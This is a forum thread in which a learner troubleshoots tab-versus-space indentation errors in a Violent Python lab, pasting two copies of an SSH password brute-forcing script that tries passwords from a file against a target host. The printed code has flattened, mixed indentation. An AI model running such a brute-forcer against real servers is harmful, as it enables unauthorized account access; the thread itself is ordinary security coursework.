Coding frustrations…

Viewing 2 reply threads
  • Author
    Posts
    • #8470
      Triban
      Participant

      I’ve learned some valuable lessons in my path to becoming a better coder.  For one, always spell check.  If something isn’t working in your code, make sure similar calls a spelled right .acquire vs .aquire.

      I facepalmed when I discovered that little gem.  The next thing that is annoying the crap out of me is the old “tabs vs spaces” rules.  ViolentPython CH2 problem building the SSH Botnet, one of the labs is building an ssh brute forcing script.  The code looks almost exactly the same.  When I wrote it, I chose tabs for all my indentation:


      import pxssh
      import optparse
      import time
      from threading import *

      maxConnections = 5
      connection_lock = BoundedSemaphore(value=maxConnections)

      Found = False
      Fails = 0

      def connect(host, user, password, release):
      global Found
      global Fails

      try:
      s = pxssh.pxssh()
      s.login(host, user, password)
      print '[+] Password Found: ' + password
      Found = True
      except Exception, e:
      if 'read_nonblocking' in str(e):
      Fails += 1
      time.sleep(5)
      connect(host, user, password, False)
      elif 'synchronize with original prompt' in str(e):
      time.sleep(1)
      connect(host, user, password, False)

      finally:
      if release: connection_lock.release()

      def main():
      parser = optparse.OptionParser('usage%prog '+
      '-H -u -F ')
      parser.add_option('-H', dest='tgtHost', type='string',
      help='specify target host')
      parser.add_option('-F', dest='passwdFile', type='string',
      help='specify the password file')
      parser.add_option('-u', dest='user', type='string',
      help='specify the user')

      (options, args) = parser.parse_args()

      host = options.tgtHost
      passwdFile = options.passwdFile
      user = options.user

      if host == None or passwdFile == None or user == None:
      print parser.usage
      exit(0)

      fn = open(passwdFile, 'r')
      for line in fn.readlines():
      if Found:
      print "[*] Exiting: Password Found"
      exit(0)
      if Fails > 5:
      print "[!] Exiting: Too Many Socket Timeouts"
      exit(0)

      connection_lock.acquire()
      password = line.strip('r').strip('n')

      print "[-] Testing: "+str(password)
      t = Thread(target=connect, args=(host, user,
      password, True))
      child = t.start()

      if __name__ == '__main__':
      main()

      Here is the companion script from the author:


      import pxssh
      import optparse
      import time
      from threading import *

      maxConnections = 5
      connection_lock = BoundedSemaphore(value=maxConnections)

      Found = False
      Fails = 0

      def connect(host, user, password, release):
          global Found
          global Fails

          try:
              s = pxssh.pxssh()
              s.login(host, user, password)
              print '[+] Password Found: ' + password
      Found = True
          except Exception, e:
              if 'read_nonblocking' in str(e):
          Fails += 1
                  time.sleep(5)
                  connect(host, user, password, False)
      elif 'synchronize with original prompt' in str(e):
          time.sleep(1)
          connect(host, user, password, False)

          finally:
      if release: connection_lock.release()

      def main():
          parser = optparse.OptionParser('usage %prog '+
            '-H -u -F '
                                    )
          parser.add_option('-H', dest='tgtHost', type='string',
            help='specify target host')
          parser.add_option('-F', dest='passwdFile', type='string',
            help='specify password file')
          parser.add_option('-u', dest='user', type='string',
            help='specify the user')

          (options, args) = parser.parse_args()
          host = options.tgtHost
          passwdFile = options.passwdFile
          user = options.user

          if host == None or passwdFile == None or user == None:
              print parser.usage
              exit(0)
             
          fn = open(passwdFile, 'r')
          for line in fn.readlines():

      if Found:
          print "[*] Exiting: Password Found"
          exit(0)
              if Fails > 5:
          print "[!] Exiting: Too Many Socket Timeouts"
          exit(0)

      connection_lock.acquire()
              password = line.strip('r').strip('n')
      print "[-] Testing: "+str(password)
              t = Thread(target=connect, args=(host, user,
                password, True))
              child = t.start()

      if __name__ == '__main__':
          main()

      Looks pretty similar right?  Now throw that into something like Notepad++ and put the “Show all characters” on.  Notice some differences, he chose spaces in most of the code except for some parts.  One in particular is line 20 “Found = True” run it with my code, Syntax Error.  Run his, no problems.  If I switch to all spaces, problem still occurs, if I match his tabs, no problem.  I find it ponderous.  I wrote the my scripts in GEdit, it was originally set to use spaces for indentation, I switched it to tabs due to laziness.  Not sure if it would have made a difference though.

      Any thoughts?

      HA!  Actually looking at it through this, I can definitely see some differences.  It seems mine has many extra spaces compared to the author’s. 

    • #53053
      Anonymous
      Participant

      Stick to the one that works and save stress.
      Mixing tab and space is the worst thing that can
      in any programming language.Goodluck.

    • #53054
      Triban
      Participant

      Thanks, I figured that would be the best bet.  What I think happened is that in GEdit and Notepad++ you can set auto-indent, they must have thrown some garbage in there somewhere.  So I turned that feature off.  I think I will rewrite the code from scratch and see what happens.  What I did learn from this is the -t and -tt switches when running the python command.  That is handy.

Viewing 2 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2020 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?